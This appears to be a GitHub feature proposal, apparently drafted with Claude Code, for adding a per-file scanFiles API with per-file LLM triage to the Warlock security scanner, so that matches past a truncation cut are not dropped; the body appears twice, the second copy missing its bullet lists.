Why
Warlock today exposes `scan(content)` — single content blob in, matches out. Consumers that need to scan a directory of files (the wizard's skill-install scan, for example) end up building aggregation logic on top, which has two correctness pitfalls:
- Combined-buffer triage drops real attacks. If the consumer scans each file then concatenates everything into a `combined` string and passes `combined.slice(0, MAX_SCAN_LENGTH)` to `triageMatches`, matches whose evidence lives in files past the truncation cut are invisible to the triage LLM → biased toward `false_positive` → real violations get dropped.
- Per-file scan + cross-file aggregation is repeated boilerplate. Every consumer reinvents file reading, scan loops, match accumulation, and (incorrectly) triage windowing.
The wizard hit pitfall #1 in scanSkillFiles. The short-term fix on the wizard side is to triage per-file (each file's matches against that file's content), but the proper home for this abstraction is warlock.
Proposal
```ts
export interface ScanFilesOptions {
/** Per-file truncation cap (default: 100KB). /
maxScanLength?: number;
/* Triage provider; omit to skip triage and return all flagged matches. */
llmProvider?: LLMProvider;
}
export async function scanFiles(
filePaths: string[],
options?: ScanFilesOptions,
): Promise<ScanMatch[]>;
```
Internals:
- Read each file (parallel `fs.promises.readFile` is fine — disk I/O isn't the bottleneck).
- Per-file: scan with the file's truncated content; collect matches via `matchesForContext`.
- Per-file: triage with that file's content (not a combined buffer). Each match is judged against the evidence that produced it.
- Aggregate triaged matches across all files; return.
Wizard caller would simplify to:
```ts
const matches = await warlock.scanFiles(files, { llmProvider });
```
…and the wizard's `scanSkillFiles` helper goes away.
Out of scope
- Single-file content scanning (existing `scan(content)` stays as-is).
- WASM init / cold-start optimization (separate concern).
🤖 Generated with Claude Code
Why
Warlock today exposes `scan(content)` — single content blob in, matches out. Consumers that need to scan a directory of files (the wizard's skill-install scan, for example) end up building aggregation logic on top, which has two correctness pitfalls:
The wizard hit pitfall #1 in scanSkillFiles. The short-term fix on the wizard side is to triage per-file (each file's matches against that file's content), but the proper home for this abstraction is warlock.
Proposal
```ts
export interface ScanFilesOptions {
/** Per-file truncation cap (default: 100KB). /
maxScanLength?: number;
/* Triage provider; omit to skip triage and return all flagged matches. */
llmProvider?: LLMProvider;
}
export async function scanFiles(
filePaths: string[],
options?: ScanFilesOptions,
): Promise<ScanMatch[]>;
```
Internals:
Wizard caller would simplify to:
```ts
const matches = await warlock.scanFiles(files, { llmProvider });
```
…and the wizard's `scanSkillFiles` helper goes away.
Out of scope
🤖 Generated with Claude Code